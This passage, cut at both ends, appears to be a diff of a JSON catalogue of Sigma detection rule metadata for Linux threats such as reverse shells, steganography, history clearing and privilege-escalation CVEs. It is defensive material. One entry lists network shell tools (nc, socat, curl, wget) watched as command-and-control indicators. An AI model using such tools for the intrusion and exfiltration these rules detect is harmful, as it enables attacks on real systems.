"lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", - "https://github.com/Azure/Azure-Sentinel/pull/3059", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.t1068", - "attack.t1190", - "attack.t1203" - ] - }, - "uuid": "045b5f9c-49f7-4419-a236-9854fb3c827a", - "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd" - }, - { - "description": "Detects password policy discovery commands", - "meta": { - "author": "Ömer Günal, oscd.community, Pawel Mazur", - "creation_date": "2020/10/08", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "lnx_auditd_password_policy_discovery.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", - "https://attack.mitre.org/techniques/T1201/", - "https://linux.die.net/man/1/chage", - "https://man7.org/linux/man-pages/man1/passwd.1.html", - "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1201" - ] - }, - "uuid": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", - "value": "Password Policy Discovery" - }, - { - "description": "Detects a reload or a start of a service.", - "meta": { - "author": "Jakob Weinzettl, oscd.community", - "creation_date": "2019/09/23", - "falsepositive": [ - "Installation of legitimate service.", - "Legitimate reconfiguration of service." - ], - "filename": "lnx_auditd_pers_systemd_reload.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1543/002/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.002" - ] - }, - "uuid": "2625cc59-0634-40d0-821e-cb67382a3dd7", - "value": "Systemd Service Reload or Start" - }, - { - "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/21", - "falsepositive": [ - "Legitimate use of screenshot utility" - ], - "filename": "lnx_auditd_screencapture_import.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", - "https://attack.mitre.org/techniques/T1113/", - "https://linux.die.net/man/1/import", - "https://imagemagick.org/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ] - }, - "uuid": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", - "value": "Screen Capture with Import Tool" - }, - { - "description": "Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/13", - "falsepositive": [ - "Legitimate use of screenshot utility" - ], - "filename": "lnx_auditd_screencaputre_xwd.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", - "https://attack.mitre.org/techniques/T1113/", - "https://linux.die.net/man/1/xwd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ] - }, - "uuid": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", - "value": "Screen Capture with Xwd" - }, - { - "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", - "meta": { - "author": "Igor Fits, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "lnx_auditd_split_file_into_pieces.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1030" - ] - }, - "uuid": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", - "value": "Split A File Into Pieces - Linux" - }, - { - "description": "Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/11", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_steghide_embed_steganography.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ] - }, - "uuid": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", - "value": "Steganography Hide Files with Steghide" - }, - { - "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/11", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_steghide_extract_steganography.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ] - }, - "uuid": "a5a827d9-1bbe-4952-9293-c59d897eb41b", - "value": "Steganography Extract Files with Steghide" - }, - { - "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)\n", - "meta": { - "author": "Marie Euler", - "creation_date": "2020/05/18", - "falsepositive": [ - "Admin or User activity" - ], - "filename": "lnx_auditd_susp_c2_commands.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/Neo23x0/auditd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml" - ], - "tags": [ - "attack.command_and_control" - ] - }, - "uuid": "f7158a64-6204-4d6d-868a-6e6378b467e0", - "value": "Suspicious C2 Activities" - }, - { - "description": "Detects relevant commands often related to malware or hacking activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/12/12", - "falsepositive": [ - "Admin activity" - ], - "filename": "lnx_auditd_susp_cmds.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "Internal Research - mostly derived from exploit code including code in MSF", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_cmds.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ] - }, - "uuid": "1543ae20-cbdf-4ec1-8d12-7664d667a825", - "value": "Suspicious Commands Linux" - }, - { - "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/01/23", - "falsepositive": [ - "Admin activity (especially in /tmp folders)", - "Crazy web applications" - ], - "filename": "lnx_auditd_susp_exe_folders.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml" - ], - "tags": [ - "attack.t1587", - "attack.t1584", - "attack.resource_development" - ] - }, - "uuid": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", - "value": "Program Executions in Suspicious Folders" - }, - { - "description": "Detects commandline operations on shell history files", - "meta": { - "author": "Mikhail Larin, oscd.community", - "creation_date": "2020/10/17", - "falsepositive": [ - "Legitimate administrative activity", - "Legitimate software, cleaning hist file" - ], - "filename": "lnx_auditd_susp_histfile_operations.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.003" - ] - }, - "uuid": "eae8ce9f-bde9-47a6-8e79-f20d18419910", - "value": "Suspicious History File Operations - Linux" - }, - { - "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2022/02/03", - "falsepositive": [ - "Admin work like legit service installs." - ], - "filename": "lnx_auditd_systemd_service_creation.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1543/002/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.002" - ] - }, - "uuid": "1bac86ba-41aa-4f62-9d6b-405eac99b485", - "value": "Systemd Service Creation" - }, - { - "description": "Detects System Information Discovery commands", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/03", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "lnx_auditd_system_info_discovery.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1082/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ] - }, - "uuid": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", - "value": "System Information Discovery - Auditd" - }, - { - "description": "Detects system information discovery commands", - "meta": { - "author": "Ömer Günal, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "lnx_auditd_system_info_discovery2.yml", - "level": "informational", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ] - }, - "uuid": "1f358e2e-cb63-43c3-b575-dfb072a6814f", - "value": "System and Hardware Information Discovery" - }, - { - "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", - "meta": { - "author": "Igor Fits, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "lnx_auditd_system_shutdown_reboot.yml", - "level": "informational", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml" - ], - "tags": [ - "attack.impact", - "attack.t1529" - ] - }, - "uuid": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", - "value": "System Shutdown/Reboot - Linux" - }, - { - "description": "Detects extracting of zip file from image file", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/09", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ] - }, - "uuid": "edd595d7-7895-4fa7-acb3-85a18a8772ca", - "value": "Steganography Unzip Hidden Information From Picture File" - }, - { - "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Admin activity" - ], - "filename": "lnx_auditd_user_discovery.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_user_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ] - }, - "uuid": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", - "value": "System Owner or User Discovery" - }, - { - "description": "Detects possible command execution by web application/web shell", - "meta": { - "author": "Ilyas Ochkov, Beyu Denis, oscd.community", - "creation_date": "2019/10/12", - "falsepositive": [ - "Admin activity", - "Crazy web applications" - ], - "filename": "lnx_auditd_web_rce.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "Personal Experience of the Author", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_web_rce.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "c0d3734d-330f-4a03-aae2-65dacc6a8222", - "value": "Webshell Remote Command Execution" - }, - { - "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/04/09", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_apt_equationgroup_lnx.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml" - ], - "tags": [ - "attack.execution", - "attack.g0020", - "attack.t1059.004" - ] - }, - "uuid": "41e5c73d-9983-4b69-bd03-e13b67e9623c", - "value": "Equation Group Indicators" - }, - { - "description": "Detects buffer overflow attempts in Unix system log files", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/01", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_buffer_overflows.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_buffer_overflows.yml" - ], - "tags": [ - "attack.t1068", - "attack.privilege_escalation" - ] - }, - "uuid": "18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", - "value": "Buffer Overflow Attempts" - }, - { - "description": "Detects specific commands commonly used to remove or empty the syslog", - "meta": { - "author": "Max Altgelt", - "creation_date": "2021/09/10", - "falsepositive": [ - "Log rotation" - ], - "filename": "lnx_clear_syslog.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_clear_syslog.yml" - ], - "tags": [ - "attack.impact", - "attack.t1565.001" - ] - }, - "uuid": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", - "value": "Commands to Clear or Remove the Syslog - Builtin" - }, - { - "description": "Detects suspicious modification of crontab file.", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2022/04/16", - "falsepositive": [ - "Legitimate modification of crontab" - ], - "filename": "lnx_crontab_file_modification.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_crontab_file_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.003" - ] - }, - "uuid": "af202fd3-7bff-4212-a25a-fb34606cfcbe", - "value": "Modifying Crontab" - }, - { - "description": "Detects the use of tools that copy files from or to remote systems", - "meta": { - "author": "Ömer Günal", - "creation_date": "2020/06/18", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "lnx_file_copy.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1105/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_file_copy.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1105" - ] - }, - "uuid": "7a14080d-a048-4de8-ae58-604ce58a795b", - "value": "Remote File Copy" - }, - { - "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/05/05", - "falsepositive": [ - "Rare temporary workaround for library misconfiguration" - ], - "filename": "lnx_ldso_preload_injection.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://man7.org/linux/man-pages/man8/ld.so.8.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_ldso_preload_injection.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.006" - ] - }, - "uuid": "7e3c4651-c347-40c4-b1d4-d48590fdf684", - "value": "Code Injection by ld.so Preload" - }, - { - "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2022/05/04", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/", - "https://github.com/Immersive-Labs-Sec/nimbuspwn", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ] - }, - "uuid": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", - "value": "Nimbuspwn Exploitation" - }, - { - "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", - "meta": { - "author": "Sreeman", - "creation_date": "2022/01/26", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_pwnkit_local_privilege_escalation.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://twitter.com/wdormann/status/1486161836961579020", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_pwnkit_local_privilege_escalation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.001" - ] - }, - "uuid": "0506a799-698b-43b4-85a1-ac4c84c720e9", - "value": "PwnKit Local Privilege Escalation" - }, - { - "description": "Detects shellshock expressions in log files", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/14", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_shellshock.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shellshock.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", - "value": "Shellshock Expression" - }, - { - "description": "Clear command history in linux which is used for defense evasion.", - "meta": { - "author": "Patrick Bareiss", - "creation_date": "2019/03/24", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_shell_clear_cmd_history.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", - "https://attack.mitre.org/techniques/T1070/003/", - "https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ] - }, - "uuid": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", - "value": "Clear Command History" - }, - { - "description": "Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.", - "meta": { - "author": "Patrick Bareiss", - "creation_date": "2019/04/05", - "falsepositive": [ - "Troubleshooting on Linux Machines" - ], - "filename": "lnx_shell_priv_esc_prep.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", - "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", - "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ] - }, - "uuid": "444ade84-c362-4260-b1f3-e45e20e1a905", - "value": "Privilege Escalation Preparation" - }, - { - "description": "Detects suspicious shell commands used in various exploit codes (see references)", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/08/21", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_shell_susp_commands.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", - "http://pastebin.com/FtygZ1cg", - "https://artkond.com/2017/03/23/pivoting-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ] - }, - "uuid": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", - "value": "Suspicious Activity in Shell Commands" - }, - { - "description": "Detects suspicious log entries in Linux log files", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/25", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_shell_susp_log_entries.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_log_entries.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", - "value": "Suspicious Log Entries" - }, - { - "description": "Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/04/02", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_shell_susp_rev_shells.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://alamot.github.io/reverse_shells/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_rev_shells.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ] - }, - "uuid": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", - "value": "Suspicious Reverse Shell Command Line" - }, - { - "description": "Detects space after filename", - "meta": { - "author": "Ömer Günal", - "creation_date": "2020/06/17", - "falsepositive": [ - "Typos" - ], - "filename": "lnx_space_after_filename_.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1064", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_space_after_filename_.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "879c3015-c88b-4782-93d7-07adf92dbcb7", - "value": "Space After Filename" - }, - { - "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/15", - "falsepositive": [ - "Unlikely" - ], - "filename": "lnx_sudo_cve_2019_14287_user.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.openwall.com/lists/oss-security/2019/10/14/1", - "https://access.redhat.com/security/cve/cve-2019-14287", - "https://twitter.com/matthieugarin/status/1183970598210412546", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.t1548.003", - "cve.2019.14287" - ] - }, - "uuid": "7fcc54cb-f27d-4684-84b7-436af096f858", - "value": "Sudo Privilege Escalation CVE-2019-14287 - Builtin" - }, - { - "description": "Detects suspicious command with /dev/tcp", - "meta": { - "author": "frack113", - "creation_date": "2021/12/10", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_susp_dev_tcp.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", - "https://book.hacktricks.xyz/shells/shells/linux", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" - ], - "tags": [ - "attack.reconnaissance" - ] - }, - "uuid": "6cc5fceb-9a71-4c23-aeeb-963abe0b279c", - "value": "Suspicious Use of /dev/tcp" - }, - { - "description": "Detects suspicious command sequence that JexBoss", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_susp_jexboss.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.us-cert.gov/ncas/analysis-reports/AR18-312A", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_jexboss.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ] - }, - "uuid": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", - "value": "JexBoss Command Sequence" - }, - { - "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/04/05", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_symlink_etc_passwd.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.qualys.com/2021/05/04/21nails/21nails.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_symlink_etc_passwd.yml" - ], - "tags": [ - "attack.t1204.001", - "attack.execution" - ] - }, - "uuid": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", - "value": "Symlink Etc Passwd" - }, - { - "description": "Detects the creation of doas.conf file in linux host platform.", - "meta": { - "author": "Sittikorn S, Teoderick Contreras", - "creation_date": "2022/01/20", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_create_lnx_doas_conf_creation.yml", - "level": "medium", - "logsource.category": "file_create", - "logsource.product": "linux", - "refs": [ - "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", - "https://www.makeuseof.com/how-to-install-and-use-doas/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ] - }, - "uuid": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", - "value": "Linux Doas Conf File Creation" - }, - { - "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "creation_date": "2021/10/15", - "falsepositive": [ - "Any legitimate cron file." - ], - "filename": "file_create_lnx_persistence_cron_files.yml", - "level": "medium", - "logsource.category": "file_create", - "logsource.product": "linux", - "refs": [ - 